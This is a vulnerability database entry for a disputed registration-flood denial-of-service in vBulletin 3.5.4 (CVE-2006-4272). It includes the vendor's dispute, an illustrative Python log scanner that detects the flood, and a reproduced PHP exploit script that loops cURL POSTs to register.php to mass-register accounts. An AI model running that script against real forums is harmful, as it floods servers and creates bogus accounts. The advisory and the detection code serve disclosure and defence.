Jelsoft vBulletin 'register.php' Denial-of-Service Vulnerability

Vulnerability ID: 1193772    Vulnerability type: Unknown
Published: 2006-08-21    Updated: 2006-08-26
CVE ID: CVE-2006-4272    CNNVD-ID: CNNVD-200608-336
Platform: N/A    CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006080135
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-336
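|Vulnerability details
**DISPUTED** Jelsoft vBulletin 3.5.4 allows remote attackers to register multiple arbitrary users and trigger a denial of service (resource consumption) through a large number of requests to the register.php script. Note: the vendor disputes this vulnerability, stating: "If CAPTCHA is enabled, the registrations will not go through ... if you are talking about a flood being possible, then that should be a problem solved at the server level."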
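
A server-level check for the request pattern described above, as an added example that is not part of the original advisory or of vBulletin: it scans a combined-format access log for clients that POST to register.php more often than a threshold within a sliding window. The threshold, window, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access-log prefix: ip - - [time] "METHOD path PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3}'
)

def find_registration_floods(lines, max_posts=5, window=timedelta(seconds=60)):
    """Return {ip: peak count} for clients that sent more than max_posts
    POSTs to register.php within any sliding window. Lines must be in time order."""
    recent = defaultdict(deque)  # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Drop the query string and match on the script name only.
        if not m["path"].split("?", 1)[0].endswith("/register.php"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) > max_posts:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks

def build_sample_log():
    """Constructed sample data (documentation-range IPs), not real traffic."""
    base = datetime(2006, 8, 21, 12, 0, 0, tzinfo=timezone.utc)
    def entry(ip, secs, method, path):
        ts = (base + timedelta(seconds=secs)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 512 "-" "-"'
    # One client posting ten times in ten seconds, one posting every 40 s, one normal visitor.
    log = [entry("203.0.113.7", s, "POST", "/vb3/register.php") for s in range(10)]
    log += [entry("192.0.2.5", s, "POST", "/vb3/register.php") for s in range(0, 240, 40)]
    log += [entry("198.51.100.20", 3, "GET", "/vb3/register.php"),
            entry("198.51.100.20", 20, "POST", "/vb3/register.php?do=addmember")]
    return log

if __name__ == "__main__":
    for ip, count in find_registration_floods(build_sample_log()).items():
        print(f"{ip}: {count} registration POSTs within 60s")
```

The same per-client counting can feed a block list or a rate limit at the web server, which is the layer the vendor's statement points to.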
|Exploit
####################### vBulletin Version 3.5.4 #########################

Script     : vBulletin Version 3.5.4
site       : www.vbulletin.com
Exploit by : x-boy
E-mail     : Dicomdk (at) gmail (dot) com
Type       : Registration flood in register.php
Thanks to  : Simo64

#########################################################################

Code of exploit (For English version, you can change it to other language) => exploit.php

cURL must be activated (http://curl.haxx.se)

Sorry for my bad English :-)

#########################################################################

<?
set_time_limit(60);

//You can change 10 to other numbers
for($i = 1 ; $i <= 10 ; $i++)
{
    //to put curl to send POST request
    $ch = curl_init();

    //change http://localhost/vb3 to the url of the script
    curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');
    curl_setopt($ch , CURLOPT_POST , 1) ;
    curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gmail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');
    curl_exec($ch);
    curl_close($ch);
}
//Flood finished  good luck
?>

##########################################################################
|References

Source: BUGTRAQ
Name: 20060815 UPDATE vBulletin Version 3.5.4 exploit
Link: http://www.securityfocus.com/archive/1/archive/1/443648/100/0/threaded
Source: BUGTRAQ
Name: 20060818 Re: UPDATE vBulletin Version 3.5.4 exploit
Link: http://archives.neohapsis.com/archives/bugtraq/2006-08/0381.html
Source: SREASON
Name: 1426
Link: http://securityreason.com/securityalert/1426